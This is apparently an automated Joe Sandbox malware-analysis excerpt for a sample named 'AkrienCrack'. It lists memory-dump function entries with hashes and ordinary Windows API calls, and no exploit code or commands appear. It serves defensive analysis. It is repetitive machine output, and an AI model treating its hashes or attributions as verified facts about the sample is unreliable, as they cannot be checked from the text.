              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: 3ba51f53cda254ddb6183e55b174b07c230952fa448bfb86a0ddcb04cf0c89d7
              • Instruction ID: 61550ab872c7814b8a4ee5829cd7737ad1592e3df603562e203da36524a87b94
              • Opcode Fuzzy Hash: 3ba51f53cda254ddb6183e55b174b07c230952fa448bfb86a0ddcb04cf0c89d7
              • Instruction Fuzzy Hash: E5D01225A4CF06247D9837B4ACA25A923C4DE53FB47F04BC6F730EA1E2EE2DC145A111
              APIs
              • DloadLock.DELAYIMP ref: 00B5DC73
              • DloadProtectSection.DELAYIMP ref: 00B5DC8F
                • Part of subcall function 00B5DE67: DloadObtainSection.DELAYIMP ref: 00B5DE77
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              • Opcode ID: f0d387554b592a95abd3875c1437f0fd02e2a7132dd12393aab8471d5a3fbfda
              • Instruction ID: 63cf85e9dccd89279f35cc63e6ea13430a4717ae76d485f711f001f19b9d3ab6
              • Opcode Fuzzy Hash: f0d387554b592a95abd3875c1437f0fd02e2a7132dd12393aab8471d5a3fbfda
              • Instruction Fuzzy Hash: CBD0C970114200AAC631BB54998771C22F0F725796F6407C1A906870A0EFE454A9CA05
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              • Opcode ID: d7d7df4e8a8646822d67f16f91b2886f8305a4b19cd6cdced51c6b22e5e4f16c
              • Instruction ID: 6f27db5e7fab911a0d774040e5996f9f0817c87c73afde2ef84434b47c600385
              • Opcode Fuzzy Hash: d7d7df4e8a8646822d67f16f91b2886f8305a4b19cd6cdced51c6b22e5e4f16c
              • Instruction Fuzzy Hash: B5C01232058200BECB010BB4DD0AD2FBBA8EBA6212F05C908B2A5D2060CA38C010DB11
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 368438489ff08d8bee5c1821a0d90d104ac9673d2a6b96443a0dc3423ec60f2f
              • Instruction ID: 2941d8c45e69126798c719cb4ee9ee72a19e6e9b22ad08351a199e5a895e30d8
              • Opcode Fuzzy Hash: 368438489ff08d8bee5c1821a0d90d104ac9673d2a6b96443a0dc3423ec60f2f
              • Instruction Fuzzy Hash: 66C17F70E042549FEF15CF6CC884BA97BE5EF06300F0848F9DC469F286DB219A84EB61
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 8d20447e3a830bc1862d8da8d796de4f70412f5937122cd002001013f6b38d34
              • Instruction ID: bdee38cdf2540c9771292944be90c40bb2aefc49e9fe487f2fdc48025db86b8a
              • Opcode Fuzzy Hash: 8d20447e3a830bc1862d8da8d796de4f70412f5937122cd002001013f6b38d34
              • Instruction Fuzzy Hash: C471F071500F44AECB25DB74CC81AE7B7E8EF14701F4849AEE5AB47242DA316B48EF11
              APIs
              • __EH_prolog.LIBCMT ref: 00B48384
                • Part of subcall function 00B41380: __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B41380: new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B419A6: __EH_prolog.LIBCMT ref: 00B419AB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 0770e55434480e91b164a589c2d525e10e42d8bdd65eea6f470e07a3aeae3852
              • Instruction ID: 37bd026a010779b30a9ce607ed5ce401b6c8aec313cf1c0fd2b625ba3baa205a
              • Opcode Fuzzy Hash: 0770e55434480e91b164a589c2d525e10e42d8bdd65eea6f470e07a3aeae3852
              • Instruction Fuzzy Hash: E0419F31D406589ADB24EB64C855BEEB3E8AF50300F0444EAE58AA3192DF755BC8EB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B41E05
                • Part of subcall function 00B43B3D: __EH_prolog.LIBCMT ref: 00B43B42
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 399a62b7bd55ae32fc946c017c8f617050a155646eccce6f9969504524ac069c
              • Instruction ID: 3c37cc432ab47f22886e83a72fed461e00404909fe59a23ee42067edf86d29ae
              • Opcode Fuzzy Hash: 399a62b7bd55ae32fc946c017c8f617050a155646eccce6f9969504524ac069c
              • Instruction Fuzzy Hash: C5213932D441089FCB15EF98D951AEEFBF5FF58300B1008ADE845A7251CB325E54DB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B5A7C8
                • Part of subcall function 00B41380: __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B41380: new.LIBCMT ref: 00B413FE
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 85cdfd6c9edf07e59896e5db42b55b4f0283078d38f10a63796b3489fce78034
              • Instruction ID: 8445ab7226a8141ab4ca125d00adccebfa320b32ff8a9ade92a32e503d408fee
              • Opcode Fuzzy Hash: 85cdfd6c9edf07e59896e5db42b55b4f0283078d38f10a63796b3489fce78034
              • Instruction Fuzzy Hash: 5D213D71C04249AACF15DF58C9515EEBBF4EF19304F1005EAE809B7242D735AF4ADB61
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 12f9e68eecf2e6508818a97edc96db2008ef3edf2a8574f53322ed957367caef
              • Instruction ID: 387b20e4af1f3960cbe610f49a10efd5d83893cd0362f86cc02541683e180567
              • Opcode Fuzzy Hash: 12f9e68eecf2e6508818a97edc96db2008ef3edf2a8574f53322ed957367caef
              • Instruction Fuzzy Hash: 8F11A173E415289BCB22AFACCC419DEBBB6EF49B50F0041A5FC14B7251CB358E10A6A4
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction ID: 67524c88efb9546e5d7d25d9f069f7ece07aaeea45434af64ce674b1f409180f
              • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
              • Instruction Fuzzy Hash: 31F0C230980B059FDB30DE74C941716B7E8EB15330F20899EE496C7690E770DA80E752
              APIs
              • __EH_prolog.LIBCMT ref: 00B45BDC
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 194a7b4e066d7730bad5be68315c0eec258ff4cf38c00345512665d11e963287
              • Instruction ID: 88e45cb8e4ebf58c73d42b77b8a576ea8a2692db6775f9bb18d8486a58c2d998
              • Opcode Fuzzy Hash: 194a7b4e066d7730bad5be68315c0eec258ff4cf38c00345512665d11e963287
              • Instruction Fuzzy Hash: 46016D30A05685DACB25F7A8C0557EDF7E49F19701F4085DEA85A53283CBB41B09E662
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 3ada9cc444472b51796bc453e36845078f104e82648dfc0fd68b9dea550111f2
              • Instruction ID: af0cab945d8a7270fc1d87be31d46e7d77ab2ad4d2ee9d7240d1f5e817be1a8c
              • Opcode Fuzzy Hash: 3ada9cc444472b51796bc453e36845078f104e82648dfc0fd68b9dea550111f2
              • Instruction Fuzzy Hash: E5E065215402615AEB312A695C05B5A77CCDF617F0F1507A1AE5AA61D1DE28CC0145E6
              APIs
              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B4968F,?,?,?,?,00B71FA1,000000FF), ref: 00B496EB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 21c849738952e9b58090c3af9dc53b651901488ff759ac8bccd428340b5d1c74
              • Instruction ID: 2c6de7a9febcbe28cf3d3ed8bf2b1ccad2adc14d68028b37ca9a3ecd03a7fccc
              • Opcode Fuzzy Hash: 21c849738952e9b58090c3af9dc53b651901488ff759ac8bccd428340b5d1c74
              • Instruction Fuzzy Hash: 93F0BE30096B008FDB308A20C549793B7E49B12725F048B9EC0EB035A49770AA8DAB00
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B4A4F5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: c3012f1042e81b9e166ecb476cd0cbcb590b9008bffad0dac48f687eb0b66c44
              • Instruction ID: e5395495617b31fdc933aad71b13f399d30bd98e2fc56c3b4a08e3b982f51d24
              • Opcode Fuzzy Hash: c3012f1042e81b9e166ecb476cd0cbcb590b9008bffad0dac48f687eb0b66c44
              • Instruction Fuzzy Hash: 50F08935449780AACA225B7848047DB7BD1AF16371F04CA89F5FD12191C27556D5B723
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 00B506B1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: b7993186ba3d379d8c0e162885745fc5f22ac7a3c2ff04d8065294a11b404837
              • Instruction ID: 890c76848094e80c68b13e49fd9afea29fc9a3a7ef70de957724d48c16d514cd
              • Opcode Fuzzy Hash: b7993186ba3d379d8c0e162885745fc5f22ac7a3c2ff04d8065294a11b404837
              • Instruction Fuzzy Hash: 3CD02B3122001075CA213329A81A7FE1BC64FC3752F0900E1F90D131938F46488FA3E3
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00B59D81
                • Part of subcall function 00B59B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B59B30
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction ID: 985683780749d20e20e561bb21a92999d39938778f84e940c9851815f6cb9c0e
              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
              • Instruction Fuzzy Hash: FDD09E3065420DAAAF45BF659C02B6A7AE9DB00351F1041F5BC0886191E972DA14A661
              APIs
              • GetFileType.KERNELBASE(000000FF,00B49887), ref: 00B49995
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 6962e01d646e8ac55ec3cf0a19636f24ad98e33ca5966ec0f1ff5f110cd489ad
              • Instruction ID: ab41efd76012b41c48c95362455d65f92163072851ad83b90b5a68b4cd570903
              • Opcode Fuzzy Hash: 6962e01d646e8ac55ec3cf0a19636f24ad98e33ca5966ec0f1ff5f110cd489ad
              • Instruction Fuzzy Hash: 53D01231011180958F2946344D0919B77E1DB83366B38C6ECD065C50A1D733CA43F541
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B5D43F
                • Part of subcall function 00B5AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
                • Part of subcall function 00B5AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
                • Part of subcall function 00B5AC74: IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
                • Part of subcall function 00B5AC74: TranslateMessage.USER32(?), ref: 00B5ACB8
                • Part of subcall function 00B5AC74: DispatchMessageW.USER32(?), ref: 00B5ACC2
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: 9060339626cd9e45b9dc04553072444758602c8604c3eb7c11d5b6916e6ce4b2
              • Instruction ID: 54e9f98b2669fbe86072f431766e7ddf589b603ebfd9249dd975c41e570eb261
              • Opcode Fuzzy Hash: 9060339626cd9e45b9dc04553072444758602c8604c3eb7c11d5b6916e6ce4b2
              • Instruction Fuzzy Hash: 96D09E32144300BBDA112B51CE07F1F7AE6AB88B05F404694B744750B18A72AD20EB16
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
